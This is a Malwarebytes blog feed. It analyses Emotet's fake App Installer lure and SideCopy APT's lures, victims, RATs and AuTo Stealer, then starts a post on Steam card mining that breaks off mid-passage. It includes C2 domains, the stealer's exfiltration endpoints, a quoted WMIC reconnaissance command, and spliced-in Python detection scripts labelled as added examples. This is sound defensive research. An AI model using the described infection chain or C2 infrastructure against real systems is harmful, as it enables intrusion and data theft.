The Security Blog From Malwarebytes

Emotet being spread via malicious Windows App Installer packages

Thu, 12/02/2021 - 20:19

As reported by Cryptolaemus on Twitter, and demonstrated step by step by BleepingComputer, Emotet is now being distributed through malicious Windows App Installer packages that pretend to be Adobe PDF software.

How does the attack work?

To understand what Microsoft could do about this method, we need to look at how these attacks work. URLs are sent out to victims by malspam. The emails are made to look like replies to existing conversations by using stolen reply-chain emails, and they ask the recipient to look at an attachment. Clicking the link brings the victim to a fake Google Drive page that prompts them to click a button to preview the PDF document.

Clicking the “Preview PDF” button triggers an ms-appinstaller: URL that attempts to open a file with an .appinstaller extension hosted on Microsoft Azure, using URLs at *. Files with this extension belong to Microsoft’s App Installer. An .appinstaller file is an XML manifest that you can write yourself or generate, for example with Visual Studio. It specifies where the MSIX package is located and how it should be updated, which is how you let multiple users deploy the same MSIX installation file.

When an .appinstaller file is opened, the browser prompts whether you want to open it with Windows App Installer. In this case, once you agree, you are shown an App Installer window prompting you to install the “Adobe PDF Component.” The malicious package looks like a legitimate Adobe application: it has the genuine Adobe PDF icon, a valid certificate that marks it as a ‘Trusted App’, and fake publisher information.

If the user chooses to proceed with the install—and why would they stop this far down the rabbit hole?—App Installer downloads and installs the malicious appxbundle hosted on Microsoft Azure. The bundle drops a .dll on the affected system and creates a startup entry for it, so the DLL is launched automatically whenever a user logs into Windows. At that point the machine is infected with Emotet.
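An .appinstaller manifest is small enough to inspect before App Installer is allowed to act on it. The Python below is an added example, not code from the Malwarebytes post or from Microsoft: it parses a manifest, pulls out the publisher and the package URI, and flags the combination this campaign relied on, a vendor-looking publisher name whose package is fetched from generic cloud storage instead of that vendor’s own domain. The sample manifest is constructed to mirror the lure described above; the Azure storage hostname suffixes and the Adobe-to-adobe.com pairing are assumptions of the example, while the manifest namespaces and the MainBundle/MainPackage attributes are the ones App Installer uses.

```python
"""Triage an .appinstaller manifest before letting App Installer act on it.

Added example, not code from the Malwarebytes post. SAMPLE_MANIFEST is a
constructed manifest shaped like the lure described above. The generic-hosting
suffixes and the publisher-to-domain table are assumptions for the example.
"""
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# Manifest namespaces accepted by App Installer (2017, 2017/2 and 2018 schemas).
APPINSTALLER_NS = (
    "http://schemas.microsoft.com/appx/appinstaller/2017",
    "http://schemas.microsoft.com/appx/appinstaller/2017/2",
    "http://schemas.microsoft.com/appx/appinstaller/2018",
)

# Hostname suffixes where anyone can publish content (assumption: Azure Storage
# static-website and blob endpoints; tune this list to your environment).
GENERIC_HOSTING_SUFFIXES = (".web.core.windows.net", ".blob.core.windows.net")

# Publisher CN substring -> domains a genuine package from that vendor should
# be fetched from (assumption for the example).
EXPECTED_PUBLISHER_DOMAINS = {"adobe": ("adobe.com",)}

# Constructed sample: "Adobe" publisher, package served from Azure static storage.
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<AppInstaller Uri="https://example0.web.core.windows.net/AdobePDF.appinstaller"
              Version="1.0.0.0"
              xmlns="http://schemas.microsoft.com/appx/appinstaller/2018">
  <MainBundle Name="AdobePDFComponent" Version="1.0.0.0"
              Publisher="CN=Adobe Inc., O=Adobe Inc., L=San Jose, S=California, C=US"
              Uri="https://example0.web.core.windows.net/AdobePDFComponent.appxbundle"/>
  <UpdateSettings>
    <OnLaunch HoursBetweenUpdateChecks="0"/>
  </UpdateSettings>
</AppInstaller>
"""


def _local(tag):
    """Strip the {namespace} prefix ElementTree puts on tag names."""
    return tag.rsplit("}", 1)[-1]


def parse_appinstaller(xml_text):
    """Return publisher, package name/URI and manifest URI from a manifest.

    Raises ValueError if the root is not <AppInstaller> in a known namespace
    or if the manifest has no <MainBundle>/<MainPackage> element.
    """
    root = ET.fromstring(xml_text.encode("utf-8"))
    ns = root.tag[1:].split("}", 1)[0] if root.tag.startswith("{") else ""
    if _local(root.tag) != "AppInstaller" or ns not in APPINSTALLER_NS:
        raise ValueError("not an App Installer manifest: %r" % root.tag)
    main = next((c for c in root if _local(c.tag) in ("MainBundle", "MainPackage")), None)
    if main is None:
        raise ValueError("manifest has no MainBundle/MainPackage")
    return {
        "kind": _local(main.tag),
        "name": main.get("Name", ""),
        "publisher": main.get("Publisher", ""),
        "package_uri": main.get("Uri", ""),
        "manifest_uri": root.get("Uri", ""),
    }


def publisher_cn(publisher):
    """Lower-cased CN= value of an X.500 publisher string ("" if absent)."""
    for part in publisher.split(","):
        key, _, value = part.strip().partition("=")
        if key.strip().upper() == "CN":
            return value.strip().lower()
    return ""


def triage(xml_text):
    """Return a list of findings; an empty list means nothing looked odd."""
    info = parse_appinstaller(xml_text)
    cn = publisher_cn(info["publisher"])
    findings = []
    for label in ("manifest_uri", "package_uri"):
        url = urlparse(info[label])
        host = (url.hostname or "").lower()
        if url.scheme != "https":
            findings.append("%s is not served over https: %s" % (label, info[label]))
        if host.endswith(GENERIC_HOSTING_SUFFIXES):
            findings.append("%s hosted on generic cloud storage: %s" % (label, host))
        for vendor, domains in EXPECTED_PUBLISHER_DOMAINS.items():
            if vendor in cn and not any(host == d or host.endswith("." + d) for d in domains):
                findings.append("publisher %r but %s host %s is not under %s"
                                % (cn, label, host, " / ".join(domains)))
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_MANIFEST) or ["no findings"]:
        print(finding)
```

Run against the constructed sample it reports four findings (both URIs sit on generic storage and neither is under adobe.com); swap the hostname for one under adobe.com and it reports none. A signed package can still be malicious, so this is a triage aid for where the package comes from, not a substitute for the certificate check App Installer already does.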

Hosting malicious files on Azure

Microsoft’s Azure cloud services have become an attractive option for cybercriminals to store malicious content: not just malicious files, as in the case of Emotet, but also phishing sites, other fraudulent sites, and command and control servers. Azure is certainly not alone; other hosting services such as Google Drive, Dropbox, and Amazon Web Services are also abused to store malicious content. But critics are hard on Microsoft because it considers itself a security vendor. At the time of writing the .appinstaller file had been removed, but it was available for download longer than it should have been.

The URL for the .appinstaller returns a 404 error

While we understand how difficult it is to inspect everything that gets uploaded to a cloud service, and that you can’t study every new customer under a microscope, we also do not know how much time passed between the first report of this new Emotet distribution method and the actual takedown.

Microsoft is receiving flak because it is its cloud service hosting the malware, its App Installer is used in the process, and its operating system (Windows) is the target of the attacks. Does that make it an enabler? Not really, and certainly not voluntarily.


While we all thought and hoped that Emotet had kicked the bucket, it made a dramatic comeback a few weeks ago. Using new distribution methods is a clear sign that it is serious about that comeback.

So, don’t click those links, even if the URL looks trustworthy, the file icon looks legit, and the file is signed. Check with the alleged sender about whether the message really comes from them and is intended for you.

Stay safe, everyone!

The post Emotet being spread via malicious Windows App Installer packages appeared first on Malwarebytes Labs.

Categories: Techie Feeds

SideCopy APT: Connecting lures to victims, payloads to infrastructure

Thu, 12/02/2021 - 16:00

This blog post was authored by Hossein Jazi and the Threat Intelligence Team.

Last week, Facebook announced that back in August it had taken action against a Pakistani APT group known as SideCopy. Facebook describes how the threat actors used romantic lures to compromise targets in Afghanistan.

In this blog post we provide additional details about SideCopy that have not been published before. We gained unique insights into the victims and targeted countries, as well as the kind of data the APT group was able to exfiltrate. Among the stolen information are credentials for government portals, Facebook, Twitter and Google accounts, banking information, and password-protected documents.

In addition, we detail how this threat actor has started to use new initial infection vectors for its operations, namely Microsoft Publisher documents and Trojanized applications. Finally, we detail a newly observed stealer used by this actor, called AuTo Stealer.

Newly observed lures

The SideCopy APT is a Pakistani threat actor that has been operating since at least 2019, mainly targeting South Asian countries and more specifically India and Afghanistan. Its name comes from its infection chain, which tries to mimic that of the SideWinder APT. It has been reported that this actor has similarities with Transparent Tribe (APT36) and is possibly a subdivision of that actor. Cisco Talos and Seqrite have provided comprehensive reports on this actor’s activities.

The lures used by SideCopy APT are usually archive files that embed one of the following: an LNK file, a Microsoft Publisher document or a Trojanized application. These lures can be categorized into two main groups:

  • Targeted lures: These lures are specially crafted to target specific victims. We believe this category is customized to target government or military officials. Here are some examples:
    • This archive file contains a Microsoft Publisher document that is a letter from “Mr Ahmad Shuja Jamal, former DG for International Relations and Regional Cooperation at the National Security Council of Afghanistan” to “Hamdullah Mohib, former National Security Adviser of Afghanistan”. The letter is about a “meeting with representatives of France and UK delegations of Afghanistan”. Most likely this lure has been used to target Afghan government officials, especially those dealing with foreign affairs.
    • This archive file contains a malicious LNK file which loads a decoy PDF file. The decoy PDF is “Email facility address list of the ERE units: 20 Sept 2021”. This lure seems to be aimed at the Indian Army and the National Cadet Corps of India.
    • Similar to the previous one, this archive includes a malicious LNK that loads a decoy PDF. The decoy is the curriculum of a course named “Living the values, a value-narrative to grass-root leadership” offered by NCERT (National Council of Educational Research and Training of India).

Figure 1: NSA meeting lure
Figure 2: Email facility address list of the ERE units: 20 Sept 2021
Figure 3: Living the values course

  • Generic lures: These lures are mostly generic and most likely have been used in spam campaigns to collect emails and credentials that help the actor perform its targeted attacks. In this category we observed the following (the first three are the ones reported as “romantic lures” in Facebook’s report):
    • Girl names as the archive file name, such as “”: (showing girl pictures with an application) These archives contain a list of images with the “.3d” extension and an application named “3Dviewer.exe” that has to be executed to load and view the images. In fact, the executable is Trojanized and contacts the actor’s servers to download the malicious payloads.
    • “image-random”: These zip files contain a malicious LNK file that shows a girl picture as a decoy.
    • “Whatsapp-image-random”: These zip files contain a malicious LNK file that shows a girl picture as a decoy.
    • “”: This archive file contains a Microsoft Publisher document that loads a Schengen Visa Application Form in English as a decoy. This is used to target people who want to travel to European countries.
    • “”: This archive contains an LNK that loads a resume as a decoy. The name of the archive file usually follows this pattern: “”
    • “New”: This loads a document as a decoy. We were not able to retrieve the lure in this case.

Figure 4: Schengen Visa Application Form
Figure 5: 3DViewer.exe

Victimology

As previously reported, the SideCopy APT has mainly targeted defense and armed forces personnel in the Indian subcontinent, but there are not many reports about how successful these attacks were and what data was exfiltrated. The Malwarebytes Threat Intelligence team was able to identify some of the successful attacks operated by this APT. It is worth noting that these compromises happened before the Taliban completely took over Afghanistan. In fact, Facebook’s intervention in August matches the timeline of the indicators we recorded.

  • Administration Office of the President (AOP) of Afghanistan personnel: The actor ran targeted spear phishing attacks on members of the AOP and was able to compromise ten of them and steal their credentials for different services: internal government services, bank services (Maiwand Bank) and personal accounts such as Google, Twitter and Facebook.
  • Ministry of Foreign Affairs, Afghanistan: We have evidence that the actor infected one member of the Ministry of Foreign Affairs, but it seems they were not able to collect any data from this victim.
  • Ministry of Finance, Afghanistan: The actor infected two members of the MOF; mostly they collected personal accounts such as Google and Facebook, and bank accounts (“”). They also exfiltrated password-protected documents.
  • Afghanistan’s National Procurement Authority (NPA): The actor infected one person in the NPA and was able to steal personal credentials including Twitter, Facebook, Instagram, Pinterest, Google and the account.
  • A shared computer, India: It seems the actor gained access to a shared machine and collected a lot of credentials for government and education services. This machine appears to have been infected using one of the generic lures.

The SideCopy APT was able to steal several Office documents and databases associated with the Government of Afghanistan. As an example, the threat actor exfiltrated Diplomatic Visa and Diplomatic ID cards from the database of the Ministry of Foreign Affairs of Afghanistan, as well as the Asset Registration and Verification Authority database belonging to the General Director of Administrative Affairs of the Government of Afghanistan. They were also able to exfiltrate the ID cards of several Afghan government officials.

Figure 6: Asset Registration and Verification Authority database belonging to the General Director of Administrative Affairs of Government of Afghanistan

The exfiltrated documents contain names, numbers and email addresses associated with government officials. It is possible that they have been already targeted by the actor or will be the future targets of this actor. There are also some confidential letters that we think the actor is planning to use for future lures.

Attacker infrastructure

We have uncovered the main command and control (C2) server used by the attacker to monitor and control its victims. Each archive file the attacker sends to victims is treated as a unique package, and each package has its own payloads, including HTA files and executables that are usually hosted on compromised domains. The actor has a system named “Scout” to monitor each package. The Scout system has four users with English nicknames (Hendrick, Alexander, Hookes, Malone). It also defines teams that are responsible for managing each package.

Figure 7: Scout system

In this system, they have a dashboard that shows all the infected machines. Each row in the dashboard shows one package and its statistics which includes the IP address of the victim, package name, OS version, User-Agent, browser information, country and victim status.

Figure 8: Dashboard

The actor uses a different dashboard called Crusader to monitor the Action RAT statistics.

Figure 9: Crusader

Analysis of the new attacks

As we mentioned earlier, the actor has used three different methods as its initial infection vector: LNK files, Microsoft Publisher files and Trojanized applications. The LNK files have been well studied, and what we observed is very similar to what has already been reported, with only small changes. For example, they have updated the code of hta.dll and preBotHta.dll and added some features.

In this section we provide the analysis for the other two variants: Microsoft Publisher and Trojanized Applications.

Microsoft Office Publisher

In this variant, the attackers have embedded a Microsoft Office Publisher document in an archive file. We identified two variants of the Publisher documents:

  • Report to NSA Mohib – Meeting with FR, GE, UK – 12 Nov

Both of these documents were created in August 2021 and we believe they have been used in the most recent campaign. Both contain a simple macro that calls the Shell function to run mshta.exe, which downloads and executes a specified HTA file.

Figure 10: Embedded macros

The HTA file loads the loader DLL (PreBotHta.dll) into memory and then collects AV product names. The AV name, along with the encoded payloads this loader needs to load, is passed to the PinkAgain function.

Figure 11: HTA file

The loader is responsible for dropping both credwiz.exe and Duser.dll. Unlike previously reported samples, in this case Duser.dll is not copied to different locations depending on the AV product; it is copied to C:\ProgramData\ShareIt regardless of the AV product.

Figure 12: Loader dll

The loader only does some additional work depending on the AV product. For example, if the AV product is Avira it tries to download and execute an additional HTA file to deploy additional payloads.

Figure 13: Additional payload execution based on the AV type

After dropping the required files onto the victim, it starts the “credwiz.exe” process. This executable side-loads the malicious payload “Duser.dll”. The payload has been written in Delphi (this is the Delphi variant of Action RAT) and was compiled on October 2, 2021.

All the commands, strings and domains in this RAT are base64 encoded. The malicious process starts by collecting the hostname, username, OS version, OS architecture, MAC address and installed AV products (by executing cmd.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List) from the victim and sending them to the command and control server in an HTTP request (""). It then goes into a loop and waits for commands from the server to execute. This RAT can execute one of the following commands:

  • Command: Execute commands received from the server
  • Download: Download additional payloads
  • Drives: Get drive info
  • GetFiles: Get files info
  • Execute: Execute a specified payload using CreateProcessW
  • Upload: Upload files to server
Figure 14: Commands

After executing each command it reports the result back to its server. The reporting URL is different from the C2 URL. The report content depends on the command; for example, if the payload executes a command, it reports the victim’s ID, the executed command, the command output and the error message if the command execution was not successful.

Trojanized Image Viewer Application (3DViewer.exe)

In this variant, the attacker has distributed an archive file containing an application named 3Dviewer.exe and a set of images with the “3d” extension that can only be opened by that executable.

It seems the attacker Trojanized an image viewer application named “3Dviewer” so that, in addition to its normal function of loading and showing the pictures, it downloads and executes a malicious HTA file using mshta. This executable was compiled on October 26, 2021. The rest of the process is similar to what we described in the previous section.

Figure 15: 3DViewer.exe

AuTo Stealer

We also came across another stealer used by this actor, written in C++. To the best of our knowledge this is a new stealer used by SideCopy APT. A loader is used to drop and load an executable (credbiz.exe) that side-loads the stealer. We identified two different variants of this loader, used to load an HTTP version and a TCP version of the stealer. Both loaders and the stealer components were compiled on October 30, 2021:


Based on its functionality, we can say this loader is a C++ variant of PreBotHta.dll (the C# loader used to load the other RATs used by this actor). This loader is responsible for dropping the following files in the C:\ProgramData\Oracle\ directory:

  • credwiz.exe, renamed to credbiz.exe
  • TextShaping.dll (the stealer component that will be side-loaded by credbiz.exe)
Figure 16: Drop credbiz and TextShaping

Similar to PreBotHta.dll, it checks the AV product installed on the victim’s machine and performs additional actions based on its name. For example, if the AV is Avast, Avira, BitDefender or AVG it creates a batch file (sysboot.bat) and executes it by calling cmd.exe; this gives credbiz.exe persistence through an AutoRun registry key. If the installed AV is Kaspersky, Symantec, McAfee or QuickHeal it creates an LNK file (Win Setting Loader.lnk) in the StartUp directory for persistence.

After performing these additional steps, it executes credbiz.exe by calling CreateProcessW.
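The loader leaves a compact set of host artifacts: a copy of the signed credwiz.exe running outside System32 under a new name, the side-loaded DLL sitting next to it in C:\ProgramData\Oracle (or Duser.dll in C:\ProgramData\ShareIt for the Action RAT chain above), and either a sysboot.bat Run-key entry or a “Win Setting Loader.lnk” in the Startup folder. The Python below is an added example, not Malwarebytes’ tooling, that scores autostart records against exactly those indicators. The records are a constructed sample in the shape of an Autoruns-style export (the field names location, entry, image and siblings are assumptions of the example); the indicator values are the ones named in the post.

```python
"""Flag SideCopy-style DLL side-loading and persistence artifacts in autostart data.

Added example, not tooling from the Malwarebytes post. SAMPLE_ENTRIES is a
constructed sample shaped like an Autoruns-style export (field names assumed);
the indicator values are the ones the post names.
"""
import ntpath

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
SIDELOAD_HOSTS = {"credwiz.exe", "credbiz.exe"}    # signed host binary and its renamed copy
PLANTED_DLLS = {"duser.dll", "textshaping.dll"}    # payloads side-loaded by that host
DROP_DIRS = ("c:\\programdata\\oracle\\", "c:\\programdata\\shareit\\")
PERSISTENCE_NAMES = {"sysboot.bat", "win setting loader.lnk"}

# Constructed sample: two records matching the AuTo stealer chain, two benign.
SAMPLE_ENTRIES = [
    {"location": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "entry": "credbiz",
     "image": r"C:\ProgramData\Oracle\credbiz.exe",
     "siblings": ["credbiz.exe", "TextShaping.dll"]},
    {"location": r"C:\Users\u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup",
     "entry": "Win Setting Loader.lnk",
     "image": r"C:\ProgramData\Oracle\credbiz.exe",
     "siblings": ["credbiz.exe", "TextShaping.dll"]},
    {"location": r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run",
     "entry": "SecurityHealth",
     "image": r"C:\Windows\System32\SecurityHealthSystray.exe",
     "siblings": []},
    {"location": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "entry": "OneDrive",
     "image": r"C:\Users\u\AppData\Local\Microsoft\OneDrive\OneDrive.exe",
     "siblings": ["OneDrive.exe", "OneDriveStandaloneUpdater.exe"]},
]


def _image_dir(image):
    """Lower-cased directory of a Windows image path, with a trailing backslash."""
    d = ntpath.dirname(image).lower()
    return d if d.endswith("\\") else d + "\\"


def check_entry(entry):
    """Return the findings for one autostart record (empty list = nothing odd)."""
    findings = []
    image = entry["image"]
    exe = ntpath.basename(image).lower()
    directory = _image_dir(image)
    in_system_dir = directory.startswith(SYSTEM_DIRS)
    siblings = {s.lower() for s in entry.get("siblings", [])}

    # credwiz.exe belongs in System32; a copy elsewhere (renamed or not) is the
    # side-loading host the post describes.
    if exe in SIDELOAD_HOSTS and not in_system_dir:
        findings.append("side-load host %s running outside System32 (%s)" % (exe, directory))
    planted = siblings & PLANTED_DLLS
    if planted and not in_system_dir:
        findings.append("planted DLL next to image: %s" % ", ".join(sorted(planted)))
    if directory.startswith(DROP_DIRS):
        findings.append("image in known SideCopy drop directory %s" % directory)
    if entry.get("entry", "").lower() in PERSISTENCE_NAMES:
        findings.append("known persistence artifact name %r" % entry["entry"])
    return findings


def scan(entries):
    """Map the index of every suspicious record to its findings."""
    return {i: f for i, f in ((i, check_entry(e)) for i, e in enumerate(entries)) if f}


if __name__ == "__main__":
    for idx, findings in scan(SAMPLE_ENTRIES).items():
        print(SAMPLE_ENTRIES[idx]["location"], SAMPLE_ENTRIES[idx]["entry"])
        for f in findings:
            print("   ", f)
```

The side-load check is the one worth keeping even after the actor rotates file names: a known-signed Windows binary launched from ProgramData or a user profile, with an unexpected DLL beside it, is the shape of T1574.002 regardless of which DLL name is in play.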

Figure 17: Additional functionality based on AV product

TextShaping.dll (Stealer component)

The actor used two different variants of the stealer: HTTP and TCP. The HTTP version performs the exfiltration over HTTP while the TCP variant performs all the exfiltration over TCP. This component also has an interesting, unique PDB path: "D:\Project Alpha\HTTP Auto\app\Release\app.pdb"

This stealer collects PowerPoint, Word, Excel and PDF documents, text files, database files and images and exfiltrates them to its server over HTTP or TCP. To exfiltrate data over HTTP, it builds a request specific to the type of file being exfiltrated and sends it to the HTTP server. For example, when it wants to exfiltrate PowerPoint documents it builds the following request:

Figure 18: Stealer

For other file types it appends the /stream path that corresponds to the file type and exfiltrates them to the server. The full list is: /streamppt, /streamdoc, /streamxls, /streamdb, /streamtxt, /streampdf, /streamimg.

Before starting the stealing process, it collects the victim’s information, including username, hostname, OS info and AV products, and sends it to its server by appending “user_details” to the domain. It also collects file information from the victim’s machine, stores it in a file named “Hostname_UserName.txt” and sends that file using the “logs_receiver” command.
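The HTTP variant’s endpoints (/streamppt, /streamdoc and friends, plus user_details and logs_receiver), the .hta stage the Publisher, LNK and 3Dviewer chains all fetch through mshta, and the C2/payload hosts in the IOC table below are all visible in ordinary web-proxy logs. The Python below is an added example, not Malwarebytes’ detection logic, that walks proxy log lines and flags those three things. The log lines are constructed, and the “timestamp client method url status” format is an assumption of the example; the domains, IP address and URI names are taken from this post.

```python
"""Spot AuTo stealer exfil, HTA staging and known SideCopy hosts in proxy logs.

Added example, not Malwarebytes' detection logic. SAMPLE_LOG is constructed and
its "timestamp client method url status" layout is an assumption; the hosts, IP
and URI names are the ones this post reports.
"""
import re
from urllib.parse import urlparse

IOC_HOSTS = {
    "afrepublic.xyz": "C2", "newsroom247.xyz": "C2", "afghannewsnetwork.com": "C2",
    "scouttable.xyz": "C2", "securedesk.one": "C2", "republicofaf.xyz": "C2",
    "appsstore.in": "C2", "scout.fontsplugins.com": "C2", "144.126.141.41": "C2",
    "maajankidevisevasansthan.org": "payload host", "amsss.in": "payload host",
    "eurekawatersolution.com": "payload host", "securecheker.in": "payload host",
}

# Exfil endpoints of the HTTP stealer plus its check-in and file-list endpoints.
# Anchored at both ends so /streamdocument or /stream/video do not match.
STEALER_PATH = re.compile(
    r"^/(?:stream(?:ppt|doc|xls|db|txt|pdf|img)|user_details|logs_receiver)(?:/|$)", re.I)

# Constructed sample: lines 1-4 are the infection chain, lines 5-6 are benign.
SAMPLE_LOG = [
    "2021-11-02T10:14:58Z 10.0.0.12 GET http://amsss.in/css/update.hta 200",
    "2021-11-02T10:15:01Z 10.0.0.12 POST http://afrepublic.xyz/user_details 200",
    "2021-11-02T10:15:09Z 10.0.0.12 POST http://afrepublic.xyz/streamdoc 200",
    "2021-11-02T10:15:12Z 10.0.0.12 POST http://144.126.141.41/logs_receiver 200",
    "2021-11-02T10:16:00Z 10.0.0.20 GET https://www.example.com/stream/video 200",
    "2021-11-02T10:16:30Z 10.0.0.20 GET https://docs.example.com/streamdocument 200",
]


def host_label(host):
    """Return the IOC role of a host (or its parent domain), else None."""
    host = host.lower()
    for ioc, label in IOC_HOSTS.items():
        if host == ioc or host.endswith("." + ioc):
            return label
    return None


def analyze_line(line):
    """Return (host, findings) for one log line; findings is empty when benign."""
    _ts, _client, method, url, _status = line.split()
    parsed = urlparse(url)
    host = (parsed.hostname or "").lower()
    path = parsed.path or "/"
    findings = []
    label = host_label(host)
    if label:
        findings.append("contact with known SideCopy %s %s" % (label, host))
    if STEALER_PATH.match(path):
        findings.append("AuTo stealer HTTP endpoint %s (%s)" % (path, method))
    if path.lower().endswith(".hta"):
        findings.append("HTA download, consistent with the mshta stage")
    return host, findings


def scan(lines):
    """Return one record per flagged line: 1-based line number, host, findings."""
    return [{"line": n, "host": h, "findings": f}
            for n, (h, f) in ((n, analyze_line(l)) for n, l in enumerate(lines, 1)) if f]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("line %d %s" % (hit["line"], hit["host"]))
        for f in hit["findings"]:
            print("   ", f)
```

The endpoint rule is the durable one: the IOC hosts will rotate, but an internal client POSTing to a bare /stream<type> path right after a user_details check-in is the stealer’s protocol, whoever is hosting it. The TCP variant does not pass through a web proxy at all, so this only covers the HTTP build.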


The SideCopy APT has been actively targeting government and military officials in South Asia. The group mainly uses archive files to target victims in spam or spear phishing campaigns. The archives usually embed an LNK file, Office document or Trojanized application that calls mshta to download and execute an HTA file. The HTA files perform fileless payload execution to deploy one of the RATs associated with this actor, such as AllaKore or Action RAT. Malwarebytes products can identify the initial infection vectors used by SideCopy and block them from execution.

Name | MD5 | Description
Report-to-NSA-Mohib-Meeting-with-FR-GE-UK.zip | 4E26CCAD3FC762EC869F7930A8457E4D |
schengen_visa_application_form_english.zip | C2831369728B7247193E2DB567900ABE |
new document.zip | 689B9FDBF35B8CEFC266A92D1D05A814 |
Image-8765.zip | D52021F350C9C2F8EE87D3B9C070704A |
Image-8853.zip | D99491117D3D96DA7D01597929BE6C8E |
479_1000.zip | 7C0A49F3B4A012BADE8404A3BE353A48 |
Muniba.zip | A65D3AB8618E7965B9AE4FAE558EB8F2 |
nisha.zip | 48C165124E151AA2A1F4909E0B34E99C |
Whatsapp-Image-7569.zip | 0023A30B3F91FA9989E0843BBEB67CC1 |
Download-Maria-Gul-CV.zip | 5044027CCB27401B06515F0912EB534A |
DP_TCP.exe | ec87ddad01869b58c4c0760a6a7d98f8 | AuTo Stealer
DP_HTTP.exe | e246728aa4679051ed20355ae862b7ef | AuTo Stealer
TextShaping.dll | c598a8406e2b9ec599ab9e6ec4e7d7c2 | AuTo Stealer
TextShaping.dll | 5f49c816d7d2b6fa274041055cc88ba7 | AuTo Stealer

Payloads

Domain/IP | Description
afrepublic.xyz | C2
newsroom247.xyz | C2
afghannewsnetwork.com | C2
maajankidevisevasansthan.org | Host payloads
amsss.in | Host payloads
scouttable.xyz | C2
securedesk.one | C2
eurekawatersolution.com | Host payloads
republicofaf.xyz | C2
securecheker.in | Host payloads
appsstore.in | C2
scout.fontsplugins.com | C2
144.126.141.41 | C2

C2s and Payload Hosts

MITRE ATT&CK techniques

Tactic | ID | Name | Details
Initial Access | T1566.001 | Phishing: Spearphishing Attachment | Distributes an archive file as a spear phishing attachment
Execution | T1047 | Windows Management Instrumentation | Uses WMIC.EXE to obtain system information and a list of installed AV products
Execution | T1059.003 | Command and Scripting Interpreter: Windows Command Shell | Starts CMD.EXE for command execution
Execution | T1204.001 | User Execution: Malicious Link |
Execution | T1204.002 | User Execution: Malicious File |
Persistence | T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder |
Discovery | T1012 | Query Registry | Reads the computer name
Discovery | T1082 | System Information Discovery |
Discovery | T1518.001 | Software Discovery: Security Software Discovery | Uses WMIC.EXE to obtain a list of installed AV products
Defense Evasion | T1218.005 | Signed Binary Proxy Execution: Mshta | Starts MSHTA.EXE to open HTA or HTML files
Defense Evasion | T1140 | Deobfuscate/Decode Files or Information | Uses base64 decoding to decode C2s
Defense Evasion | T1574.002 | Hijack Execution Flow: DLL Side-Loading | Uses credwiz.exe to side-load its malicious payloads
Collection | T1119 | Automated Collection | Collects db files, docs and PDFs automatically
Collection | T1005 | Data from Local System |
Command and Control | T1071.001 | Application Layer Protocol: Web Protocols |
Command and Control | T1071.002 | Application Layer Protocol: File Transfer Protocols |
Exfiltration | T1041 | Exfiltration Over C2 Channel |



Capcom Arcade Stadium’s record player numbers blamed on card mining

Wed, 12/01/2021 - 16:30

Some of my favourite retro video games are making waves on Steam, but not in the way you might think. Classics such as Strider, Ghosts n’ Goblins, and more are all available as content for Capcom Arcade Stadium. This is an emulator which lets you play 31 arcade games from the 80s/90s. The games themselves are paid downloadable content, but the main emulator download itself is free. It also comes with one free game as a taster of the full edition.

It didn’t have a great reception at launch, because people didn’t like titles being sold in bundles only. As such, it was something of a surprise to see it riding high at the top end of the Steam activity charts in the last few days.

Sure, the games can now be bought individually. But would that really equate to an all-time concurrent tally of 481,088 players? Did people really wake up this week and think “What we need in our lives is 3 different versions of Street Fighter 2”?

The numbers game

Make no mistake, these are some of the biggest numbers you can achieve on Steam and it typically requires a massive AAA+ title to achieve it. For example, right now the three top played games on Steam are:

  1. Counter Strike: Global Offensive with 507,995 players
  2. Dota 2 with 325,679 players
  3. PUBG: Battlegrounds with 150,498 players

These are all huge online games, played against other people. Yet somehow we have the archaic arcade emulator, with its one free game by default, storming into the top three.

These numbers are so vast that Capcom Arcade Stadium has managed to hit 8th place in the all-time records for most simultaneous players. What could possibly have caused this? The faithful translation of arcade controls to gamepads? The ability to rewind the game should you make a mistake? Customising the individual game’s arcade cabinet before loading up a title?

Nope, it’s bots.

How did bots cause the great player count inflation of 2021?

Generally when we talk about bots in gaming, we mean hacked accounts or PCs performing certain tasks. It could be a DDoS attack, or sending out phishing messages inside game chat, or some other nefarious activity.

In this case, the “bot” is something a little bit different. It’s not something caused by what happens inside the game itself. Rather, it’s a layer of virtual economy and digital goods driving what happens to the player count.

Before we get to the nitty gritty, it’s time to explain the ins and outs of Steam card trading.

Steam card trading

Sometimes folks get confused on this, so for clarity, there’s two types of “Steam card”. The first is an actual, physical gift card you can buy in stores. These cards have monetary amounts assigned to them, and they’re a way to preload your Steam account with credit. You then use it to purchase games from the store. You can also buy “digital” versions of these cards which perform the same function.

The other type of card, the one we’re focusing on, are Steam trading cards. These are items which are tied to certain games, but don’t exist within them. They’re essentially cool looking virtual cards with characters from the game on them. The more you play a game, the more likely the chance you’ll be given a free card drop. When you collect all of the cards for a game, you can create a badge for your Steam profile. At the same time, you’ll be given other community-centric items like emoticons, the possibility of discount coupons for other games, or even the option to bump up your Steam level (another profile feature).

The system is designed so you can’t just grab all of the cards by playing. There’s a limit on how many you’ll receive and then you need to get the rest by trading with friends, or buying from the Steam marketplace.

This is a very detailed system with a lot of depth to it. Steam trading is big business, and often one of the focal points for scams, phishes, and malware antics. However, that’s not the case here.

Rather, it appears to be users trying to game the system for their own ends. For once, nobody is compromising accounts and running off with a sack full of stolen logins.

Still, this raises the question: what is happening here?

The wonderful world of card mining

It’s not just Bitcoin hogging all the space in the mines these days. Steam cards can also be mined, and there’s a surprising number of tools available to do it. One of the most popular is something called ArchiSteamFarm. This is a third party tool you can log into with your Steam credentials, and it’ll tell you what can/can’t be farmed. If there are card drops available, you simply tell it which games of yours to “idle” on and we’re off to the card mining races. You don’t have to download the game in order to idle, which makes it super convenient for people wanting cards without gigabytes of downloads and wasted hard drive space.

This is where things get really interesting.

